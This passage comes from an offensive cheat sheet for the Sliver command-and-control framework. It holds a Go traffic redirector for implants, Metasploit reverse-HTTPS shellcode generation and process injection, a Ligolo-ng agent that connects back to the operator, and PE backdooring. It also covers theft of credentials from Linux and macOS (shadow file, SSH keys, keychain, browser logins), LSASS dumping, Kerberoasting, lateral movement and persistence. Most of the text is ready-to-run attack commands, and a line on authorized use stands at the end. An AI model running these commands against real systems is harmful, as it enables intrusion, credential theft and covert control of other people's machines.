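	"net/http"
	"net/http/httptest"
	"net/http/httputil"
	"net/url"
	"strings"
)

// RedirectorConfig is the implant fingerprint taken from http-c2.json plus where
// matching traffic goes. All values set in main() are placeholders, not Sliver defaults.
type RedirectorConfig struct {
	Upstream        *url.URL // Sliver http/https listener, ideally reachable only from this host
	UserAgentPrefix string   // implant_config.user_agent
	RequiredHeader  string   // one of implant_config.headers
	RequiredValue   string
	ServerHeader    string // server_config "Server" header, so decoy and real replies match
	DecoyBody       string
}

// Matches decides whether a request looks like our implant.
func (c RedirectorConfig) Matches(r *http.Request) bool {
	if !strings.HasPrefix(r.UserAgent(), c.UserAgentPrefix) {
		return false
	}
	return c.RequiredHeader == "" || r.Header.Get(c.RequiredHeader) == c.RequiredValue
}

// NewRedirector returns the handler. Matching requests are proxied unchanged:
// NewSingleHostReverseProxy keeps path, query, method, headers and body, and the
// query matters because url_parameters from http-c2.json live there.
func NewRedirector(c RedirectorConfig) http.Handler {
	proxy := httputil.NewSingleHostReverseProxy(c.Upstream)
	director := proxy.Director
	proxy.Director = func(r *http.Request) {
		director(r)
		r.Host = c.Upstream.Host
	}
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if c.Matches(r) {
			proxy.ServeHTTP(w, r)
			return
		}
		w.Header().Set("Server", c.ServerHeader)
		w.WriteHeader(http.StatusNotFound)
		_, _ = io.WriteString(w, c.DecoyBody)
	})
}

// Probe sends one request and reports status and body; used by main() and handy
// for checking a deployed redirector from the operator box.
func Probe(target, path, ua string, headers map[string]string) (int, string, error) {
	req, err := http.NewRequest(http.MethodGet, target+path, nil)
	if err != nil {
		return 0, "", err
	}
	req.Header.Set("User-Agent", ua)
	for k, v := range headers {
		req.Header.Set(k, v)
	}
	resp, err := http.DefaultClient.Do(req)
	if err != nil {
		return 0, "", err
	}
	defer resp.Body.Close()
	body, err := io.ReadAll(resp.Body)
	return resp.StatusCode, string(body), err
}

func main() {
	// Constructed stand-in for the Sliver listener: echoes the URI it received.
	listener := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		fmt.Fprintf(w, "listener saw %s", r.URL.RequestURI())
	}))
	defer listener.Close()
	up, _ := url.Parse(listener.URL)

	cfg := RedirectorConfig{
		Upstream:        up,
		UserAgentPrefix: "Mozilla/5.0 (Windows NT 10.0", // placeholder: copy from http-c2.json
		RequiredHeader:  "Accept-Language",
		RequiredValue:   "en-US,en;q=0.9",
		ServerHeader:    "nginx/1.18.0",
		DecoyBody:       "404 Not Found",
	}
	redirector := httptest.NewServer(NewRedirector(cfg))
	defer redirector.Close()
	// Production: http.ListenAndServeTLS(":443", "cert.pem", "key.pem", NewRedirector(cfg))

	implant := map[string]string{"Accept-Language": "en-US,en;q=0.9"}
	code, body, _ := Probe(redirector.URL, "/api/v2/health?_=1700000000", "Mozilla/5.0 (Windows NT 10.0; Win64; x64)", implant)
	fmt.Println(code, body) // 200 listener saw /api/v2/health?_=1700000000
	code, body, _ = Probe(redirector.URL, "/api/v2/health", "curl/8.5.0", nil)
	fmt.Println(code, body) // 404 404 Not Found
}
```

A User-Agent alone is a weak gate (scanners copy browser strings); the extra header from the profile is what keeps casual crawlers off the listener. Point Upstream at a plain http listener bound to a private interface, or give the Transport the listener's certificate, rather than disabling verification on the internal hop.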

Metasploit Integration

# From a Sliver session: run a Metasploit payload through the implant (your Sliver session stays up alongside it)
# Step 1: Start MSF handler (ExitOnSession false so it keeps listening for more than one callback)
# msfconsole → use multi/handler → set payload windows/x64/meterpreter/reverse_https
# set LHOST C2_IP, set LPORT 4444, set ExitOnSession false, run -j

# Step 2: Generate MSF shellcode
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=C2_IP LPORT=4444 -f raw -o /tmp/msf.bin

# Step 3: Inject the raw shellcode into an existing process from the Sliver session
execute-shellcode --pid 1234 /tmp/msf.bin

# Or: let Sliver call msfvenom for you (msfvenom must be installed on the Sliver server host). Sliver derives OS and
# architecture from the session, so the payload is named without the platform prefix.
msf-inject --pid 1234 --payload meterpreter/reverse_https --lhost C2_IP --lport 4444

# Run the payload inside the implant's own process instead of injecting elsewhere (fewer cross-process artefacts; a crash takes the implant with it)
msf --payload meterpreter/reverse_https --lhost C2_IP --lport 4444

Ligolo-ng Integration (Superior Pivoting)

When Sliver's SOCKS5 isn't enough (UDP, ICMP, tools that ignore proxychains), Ligolo-ng creates a full TUN interface, making the internal subnet directly routable from your Kali box.

── On your Kali operator box ──
# Create the TUN interface once (ligolo-ng 0.4/0.5; from 0.6 the proxy can create it itself with interface_create)
sudo ip tuntap add user $(whoami) mode tun ligolo
sudo ip link set ligolo up
# Start ligolo-ng proxy
./proxy -selfcert -laddr 0.0.0.0:11601

── Upload ligolo agent via Sliver session ──
upload /opt/tools/agent.exe C:\Windows\Temp\agent.exe

── Execute agent on target (connects back to the Kali ligolo proxy; -ignore-cert pairs with -selfcert above) ──
execute -d "C:\Windows\Temp\agent.exe -connect KALI_IP:11601 -ignore-cert"

── Back on Kali ligolo proxy CLI ──
session          # select the new agent
ifconfig         # see the agent's interfaces; pick the subnet to route from here
start            # start tunnel (tunnel_start in 0.6+)

── Add route for internal subnet on Kali ──
sudo ip route add 192.168.50.0/24 dev ligolo

── Now attack internal subnet directly, no proxychains needed (traffic sources from the agent host) ──
nmap -sCV 192.168.50.0/24
evil-winrm -i 192.168.50.10 -u admin -p 'pass'
impacket-psexec CORP/admin:'pass'@192.168.50.10

PE Backdooring (Inject Into Existing Binary)

# backdoor operates on a file that already sits on the target: the implant reads it, the server patches in shellcode
# built from the named implant profile, and the modified PE is written back in place
backdoor --profile win-https-beacon C:\Users\victim\Tools\app.exe     # path is a placeholder

# Caveats: any modification invalidates an Authenticode signature, so a signed binary comes back unsigned (a finding in itself),
# and the result is statically scannable like any dropped payload. Pick an unsigned tool the user actually runs; leave system
# binaries under C:\Windows alone (integrity checks and an obvious hash diff).
# When the user runs the backdoored binary, the original program runs and your beacon fires alongside it
# Useful for: trojanizing legitimate-looking tools, supply chain simulation
T1554

PPID Spoofing & Process Hollowing

# PPID spoofing: make the spawned process appear as a child of a benign parent (explorer.exe for user context, svchost.exe or
# services.exe for SYSTEM). It only changes the parent shown in process trees; defenders that compare the ETW process-creation
# event's originating process with the claimed parent still see the real creator.
# Via SharpBlock or an inline BOF for the spoofed spawn
execute-assembly /opt/tools/SharpBlock.exe "-e C:\Windows\System32\notepad.exe -p C:\Windows\Temp\beacon.exe -ppid 1234"

# Sliver's own --ppid flag on the sacrificial-process commands (execute-assembly and friends)
sideload --process C:\Windows\System32\svchost.exe --ppid <EXPLORER_PID> /tmp/payload.dll

# migrate injects into an already-running process, so its parent is whatever it already was; there is no PPID to spoof there
migrate <TARGET_PID>

# Check which PID is explorer.exe for spoofing (one per logged-on desktop session; pick the one in the target user's session)
ps | grep explorer
T1134.004 T1055.012

Build Sliver from Source

# Requirements: Go 1.21+, MinGW (for Windows cross-compile), make
git clone https://github.com/BishopFox/sliver.git
cd sliver

# Build server + client
make          # builds sliver-server and sliver-client for current OS

# Cross-compile for specific targets
make linux
make macos
make windows

# Implant code lives in implant/sliver/ and is embedded into the server binary at build time; the server compiles implants
# from that embedded source at generate time. Change it there (transports, strings, behaviour) and rebuild the server to
# pick the change up; nothing is discovered automatically.
make

# Build Docker container (fully isolated build env)
docker build -t sliver-build .
docker run -v $(pwd)/output:/root/output sliver-build make linux

# Verify build
./sliver-server_linux version
🐧

Linux Post-Exploitation

Linux

Linux Situational Awareness via Sliver

ℹ️ execute runs the named binary with its arguments; it is not a shell. Lines below that rely on pipes, &&, globs or 2>/dev/null only work when a shell interprets them (make /bin/sh the executable and pass -c '<command>' as its arguments), or run them from shell instead.

# Host info
info
execute -o "uname -a && id && hostname && cat /etc/os-release"
execute -o "cat /proc/version"

# Users and groups
execute -o "cat /etc/passwd"
execute -o "cat /etc/group"
execute -o "w; last; lastb 2>/dev/null | head -20"

# Sudo rights
execute -o "sudo -l 2>/dev/null"

# SUID / SGID / capabilities
execute -o "find / -perm -4000 -type f 2>/dev/null"
execute -o "getcap -r / 2>/dev/null"

# Cron jobs
execute -o "crontab -l 2>/dev/null; cat /etc/crontab; ls -la /etc/cron*"

# Services
execute -o "systemctl list-units --type=service --state=running"

# Network
ifconfig
netstat
execute -o "ss -tulnp; ip route; cat /etc/hosts; arp -a"

# Sensitive files
execute -o "find /home -name '.bash_history' -exec cat {} \; 2>/dev/null"
execute -o "find /etc /var /opt -name '*.conf' | xargs grep -l 'password\\|secret\\|key' 2>/dev/null"
cat /etc/shadow                          # needs root; otherwise check /etc/shadow- and /var/backups/shadow.bak (Debian/Ubuntu keep copies, occasionally left readable)
execute -o "ls -la /root/.ssh/ 2>/dev/null && cat /root/.ssh/id_rsa 2>/dev/null"

Linux Privilege Escalation via Sliver

# Upload and run LinPEAS
upload /opt/tools/linpeas.sh /tmp/lp.sh
execute -o "chmod +x /tmp/lp.sh && /tmp/lp.sh 2>/dev/null"

# Common quick wins
execute -o "sudo -l"                                          # sudo misconfig
execute -o "find / -writable -not -path '/proc/*' -type f 2>/dev/null | grep -v '/sys/' | head -30"

# Check for docker socket (instant root)
execute -o "ls -la /var/run/docker.sock 2>/dev/null && id | grep docker"

# LXD/LXC group (container escape = root)
execute -o "id | grep lxd"

# Writable /etc/passwd
execute -o "ls -la /etc/passwd /etc/shadow"

# NFS no_root_squash
execute -o "cat /etc/exports 2>/dev/null"

# Kernel exploits
execute -o "uname -r"
# Check against: https://github.com/mzet-/linux-exploit-suggester
upload /opt/tools/linux-exploit-suggester.sh /tmp/les.sh
execute -o "bash /tmp/les.sh"
T1068T1611

macOS Post-Exploitation

# macOS Sliver implant delivery: files that arrive through a browser or AirDrop get com.apple.quarantine and Gatekeeper refuses
# unsigned binaries; files fetched with curl/scp from a shell carry no quarantine flag. Strip it when present:
# xattr -d com.apple.quarantine /path/to/implant_mac   (xattr -c also works but wipes every extended attribute on the file)

# macOS situational awareness
execute -o "sw_vers; uname -a; id; whoami"
execute -o "system_profiler SPHardwareDataType"
execute -o "ls /Applications/"
execute -o "ps aux | grep -E 'mdworker|mds|com.apple'"

# Keychain enumeration
execute -o "security list-keychains"
# dump-keychain -d pops an Allow/Deny dialog per item on the user's screen; without -d it lists items and attributes only.
# For the secrets themselves, take login.keychain-db and decrypt offline with the user's login password (e.g. chainbreaker)
execute -o "security dump-keychain ~/Library/Keychains/login.keychain-db 2>/dev/null"
download "/Users/victim/Library/Keychains/login.keychain-db"

# Browser credentials (Sliver does not expand ~ in remote paths: use absolute paths)
download "/Users/victim/Library/Application Support/Google/Chrome/Default/Login Data"
download "/Users/victim/Library/Application Support/Firefox/Profiles"

# SSH keys
execute -o "ls -la ~/.ssh/ && cat ~/.ssh/id_rsa 2>/dev/null"

# TCC.db: which apps hold which privacy permissions. Reading the user DB needs Full Disk Access for the reading process.
# macOS 11+ stores the decision in auth_value (2 = allowed); 10.15 and older use allowed=1
execute -o "sqlite3 /Users/victim/Library/Application\\ Support/com.apple.TCC/TCC.db 'SELECT service,client,auth_value FROM access' 2>/dev/null"

# LaunchAgent persistence (user level, no root needed; absolute path because ~ is not expanded by upload)
upload /tmp/persist.plist "/Users/victim/Library/LaunchAgents/com.apple.update.plist"
execute -o "launchctl load /Users/victim/Library/LaunchAgents/com.apple.update.plist"     # launchctl bootstrap gui/<uid> <plist> is the non-deprecated form

# Check SIP status (System Integrity Protection)
execute -o "csrutil status"

# macOS privesc — check sudo, SUID, writable LaunchDaemons
execute -o "sudo -l"
execute -o "find / -perm -4000 -type f 2>/dev/null"
execute -o "find /Library/LaunchDaemons -writable 2>/dev/null"
T1543.001T1555.001T1059.002
🔧

Troubleshooting & Common Fixes

Debug
Problem | Cause | Fix
Implant doesn't call back | Firewall blocking port, wrong C2 address | Verify listener with jobs. Check VPS UFW allows port. From the target, curl -k https://c2.yourdomain.com to prove the path. Confirm the implant was generated for the same domain and port the listener uses.
Session immediately dies | AV killed implant, process crash | Use --obfuscate --evasion. Migrate to stable process. Try shellcode format + custom loader.
execute -o "a && b" says executable file not found | execute runs one binary with arguments; it is not a shell | Hand compound commands to a shell (cmd /c, powershell -nop -c, /bin/sh -c) or use shell for an interactive one.
execute-assembly hangs | Assembly doesn't return, exception, AV | Use --timeout 60 flag. Run in sacrificial process with --process notepad.exe.
BOF returns empty | Wrong architecture, missing args | Confirm BOF is x64. Check argument format in BOF docs. Use armory-managed BOFs.
SOCKS5 proxy not routing | proxychains config wrong, firewall | Check /etc/proxychains4.conf has socks5 127.0.0.1 1080 and no stale entries in [ProxyList]. strict_chain and dynamic_chain both work with a single proxy. Hostnames resolve on your box unless proxy_dns is set.
DNS C2 not connecting | NS delegation not in place, wrong domain | dig NS c2.yourdomain.com @8.8.8.8 must return the nameserver hostname you delegated (e.g. ns1.yourdomain.com), and dig A ns1.yourdomain.com must resolve to the VPS IP. Allow UDP/53 on the VPS.
getsystem fails | Implant is not an elevated admin (getsystem injects into a SYSTEM-owned process, which needs SeDebugPrivilege), or the target process is missing | Check whoami /priv via execute. With only SeImpersonatePrivilege (service account), use a potato-style exploit via execute-assembly instead; otherwise pick another SYSTEM process with getsystem --process.
Client can't connect to server | Config issue, wrong port, server down | Check systemctl status sliver on VPS. Verify port 31337 reachable. Re-generate operator config.
Beacon has wrong sleep | Interval set at generation | From the beacon context: reconfig --beacon-interval 60s --beacon-jitter 10s. It is queued as a task and applies at the next check-in; no session needed.
Implant flagged by AV on disk | Static signature detection | Never land on disk. Use staged payload: generate shellcode → custom loader → inject. Or use donut/ScareCrow wrapper.

Debug & Verbose Mode

# Start server in verbose/debug mode
./sliver-server_linux daemon --log-level 4         # 4=debug

# View server logs
journalctl -u sliver -f                              # if running as systemd service
cat ~/.sliver/logs/sliver.log

# Debug implant generation (verbose output)
generate --mtls C2_IP:8888 --os windows -G        # -G = debug/save Go code

# Check active jobs
jobs

# Ping implant (check if alive)
ping                                                  # from within session

# Convert beacon to interactive session (temporarily)
interactive                                           # opens real-time session from beacon

# Reconfigure beacon sleep without rebuilding (queued as a task; takes effect at the next check-in)
reconfig --beacon-interval 30s --beacon-jitter 10s

Cleanup Checklist

── Post-engagement cleanup (Windows) ──
rm C:\Windows\Temp\beacon.exe
rm C:\Windows\Temp\*.dmp
rm C:\Windows\Temp\*.zip
execute -o "schtasks /delete /tn 'SysUpdate' /f"
execute -o "sc stop MalSvc && sc delete MalSvc"
registry rm --hive HKCU --key "Software\Microsoft\Windows\CurrentVersion\Run" --value "WindowsUpdate"
# Clearing event logs is not cleanup: it writes Event ID 1102 (Security) / 104 (System), which alerts on its own, and it destroys
# the client's evidence of what you did. Leave the logs alone unless the rules of engagement explicitly require it.
# execute -o "wevtutil cl System && wevtutil cl Security && wevtutil cl Application"

── Post-engagement cleanup (Linux) ──
execute -o "rm /tmp/.update /tmp/lp.sh /tmp/les.sh 2>/dev/null"
# crontab -r wipes the user's entire crontab, legitimate jobs included; remove only your own line
execute -o "crontab -l | grep -vF '/tmp/.update' | crontab -"
execute -o "sed -i '/\/tmp\/.update/d' /home/victim/.bashrc"
execute -o "sed -i '/libsecurity.so/d' /etc/ld.so.preload && rm /lib/x86_64-linux-gnu/libsecurity.so"
# Delete the one authorized_keys line you appended, not the file (other keys belong to the user)
execute -o "systemctl disable --now netupdate && rm /etc/systemd/system/netupdate.service && systemctl daemon-reload"
# history -c only affects a shell you are typing into; the user's history file is written by their own shell. Remove your lines, do not truncate it
execute -o "sed -i '/\/tmp\/.update/d' /home/victim/.bash_history"

── Server cleanup ──
sessions prune                # remove dead sessions
beacons prune                 # remove stale beacons
📋

Full Command Reference

Server / Client Administration

Command | Description
sessions | List all active sessions
beacons | List all beacons
use <ID> | Interact with session or beacon
background | Return to top-level Sliver prompt
jobs | List active listeners
jobs -k <ID> | Kill a listener
operators | List connected operators
version | Server & client version info
loot | View all collected loot (creds, files, etc.)
loot fetch <ID> | Download a specific loot item
creds | View stored credentials
hosts | View all tracked hosts
tasks | View beacon task queue and results
monitor | Real-time event monitor (new sessions, DNS, etc.)
reaction | Automate actions on events (e.g. auto-notify on session)

In-Session Commands

Command | Description
info | Full host info (OS, user, PID, arch)
pwd | Current working directory
ls [path] | Directory listing
cd [path] | Change directory
cat [file] | Read file
download <file> | Download from target
upload <local> <remote> | Upload to target
rm <file> | Delete file
mkdir <dir> | Create directory
mv <src> <dst> | Move / rename file
ps | Process list
terminate <PID> | Kill process
migrate <PID> | Inject implant into process
procdump --pid <PID> | Memory dump of process
execute -o <cmd> | Execute a binary with arguments and capture output (not a shell)
shell | Interactive shell (cmd/bash)
execute-assembly <asm> | Run .NET assembly in-memory
execute-shellcode <bin> | Run raw shellcode in the implant or, with --pid, in another process
bof <file> | Execute BOF/COFF object file
sideload <lib> | Load shared library in-memory
spawndll <dll> | Spawn DLL in sacrificial process
ifconfig | Network interfaces
netstat | Active connections
whoami | Current user
getuid / getgid | User/group IDs
getenv [var] | Environment variables
getsystem | Spawn a SYSTEM session (needs elevated admin)
impersonate <user> | Impersonate a logged-on user's token
make-token <args> | Create token (pass-the-password)
rev2self | Revert to original token
screenshot | Capture current desktop screenshot
socks5 start | Start SOCKS5 proxy
portfwd add | Add port forward rule
tcp-pivot | Start TCP pivot listener on target
registry read | Read Windows registry key
registry write | Write Windows registry value
reg-query | Query registry (bulk)
cursed | Browser hijacking via Chrome DevTools
ping | Round-trip check to the implant (not ICMP)
backdoor | Inject Sliver implant into existing PE
msf-inject | Inject Metasploit payload via implant
🗺️

MITRE ATT&CK Mapping

Sliver Feature | MITRE Technique | ID
Beacon (async) | Scheduled Transfer | T1029
HTTPS C2 | Application Layer Protocol: Web Protocols | T1071.001
DNS C2 | Application Layer Protocol: DNS | T1071.004
execute-assembly | Command and Scripting Interpreter | T1059
Process Injection | Process Injection | T1055
migrate | Process Injection (remote thread into an existing process) | T1055
sideload | Process Injection: Dynamic-link Library Injection | T1055.001
getsystem | Access Token Manipulation | T1134
impersonate | Access Token Manipulation: Token Impersonation/Theft | T1134.001
make-token | Access Token Manipulation: Make and Impersonate Token | T1134.003
procdump (LSASS) | OS Credential Dumping: LSASS Memory | T1003.001
socks5 proxy | Proxy: Internal Proxy | T1090.001
portfwd | Protocol Tunneling | T1572
tcp-pivot | Protocol Tunneling / Proxy: Multi-hop Proxy | T1572 T1090.003
cursed (Chrome) | Browser Session Hijacking | T1185
cursed (cookies) | Steal Web Session Cookie | T1539
screenshot | Screen Capture | T1113
registry read/write | Query Registry / Modify Registry | T1012 T1112
Kerberoasting (via Rubeus) | Steal or Forge Kerberos Tickets: Kerberoasting | T1558.003
AS-REP Roasting | Steal or Forge Kerberos Tickets: AS-REP Roasting | T1558.004
Golden Ticket | Steal or Forge Kerberos Tickets: Golden Ticket | T1558.001
ADCS abuse (Certify) | Steal or Forge Authentication Certificates | T1649
--obfuscate flag | Obfuscated Files or Information | T1027
--evasion (user-space hook removal) | Impair Defenses: Disable or Modify Tools | T1562.001
backdoor (PE patching) | Compromise Host Software Binary | T1554

Quick Reference Cheatsheet

Typical Attack Flow

═══ 1. SETUP ═══
./sliver-server_linux daemon
./sliver-client_linux

═══ 2. LISTENER ═══
https --domain c2.yourdomain.com

═══ 3. GENERATE IMPLANT ═══
generate beacon --https c2.yourdomain.com --os windows --seconds 60 --jitter 20 --obfuscate --evasion --save /tmp/payload.exe

═══ 4. CATCH SESSION ═══
beacons
use <ID>
info

═══ 5. SITUATIONAL AWARENESS ═══
whoami
ps
ifconfig
netstat
execute -o "net user /domain"
execute -o "net localgroup administrators"
armory install Seatbelt && seatbelt -group=all

═══ 6. RECON AD ═══
sharp-hound -c All
download C:\Windows\Temp\*.zip

═══ 7. PRIVESC / CREDS ═══
sharp-up audit
getsystem
procdump --pid <LSASS_PID> --save /tmp/lsass.dmp
# Offline: mimikatz → sekurlsa::minidump lsass.dmp → sekurlsa::logonpasswords

═══ 8. KERBEROS ATTACKS ═══
rubeus kerberoast /nowrap /outfile:C:\Temp\tgs.txt
# hashcat -m 13100 tgs.txt rockyou.txt

═══ 9. LATERAL ═══
make-token --username admin --domain CORP --password 'CrackedPass'
upload /tmp/beacon.exe \\NEWHOST\C$\Windows\Temp\
execute -o "wmic /node:NEWHOST process call create 'C:\Windows\Temp\beacon.exe'"

═══ 10. PIVOT (isolated subnet) ═══
socks5 start --port 1080
# proxychains <tool> against internal subnet

═══ 11. CLEANUP ═══
rm C:\Windows\Temp\beacon.exe
rm C:\Windows\Temp\*.zip
sessions prune

Useful One-Liners

# Quick host overview
execute -o "systeminfo | findstr /B /C:'Host Name' /C:'OS Name' /C:'OS Version' /C:'Domain'"

# Find domain controllers
execute -o "nltest /dclist:DOMAIN"

# Find domain admins
execute -o "net group 'Domain Admins' /domain"

# Check AppLocker
execute -o "powershell -nop -c \"Get-AppLockerPolicy -Effective | Select-Object -ExpandProperty RuleCollections\""

# Find MSSQL servers in domain
execute -o "setspn -T DOMAIN -Q MSSQLSvc/*"

# List shares on a host (net view shows names, not permissions; prove write access by uploading a harmless file to the UNC path and deleting it)
execute -o "net view \\DC01 /all"

# Dump DPAPI-protected browser passwords for the current user (user scope: triage plus SharpChrome; machinetriage covers SYSTEM-scope secrets and needs elevation)
sharp-dpapi triage
execute-assembly /opt/tools/SharpChrome.exe logins

# Certify quick check
certify find /vulnerable

🎯 Pro Tip — Beacon over sessions: Default to beacons for all operations. Only upgrade to a session when you need real-time interaction. Set beacon sleep to 60–120s with 20-30% jitter. This dramatically reduces your footprint in EDR telemetry.
⚠️ All techniques above are for authorized engagements only. Always confirm scope and rules of engagement before executing any command.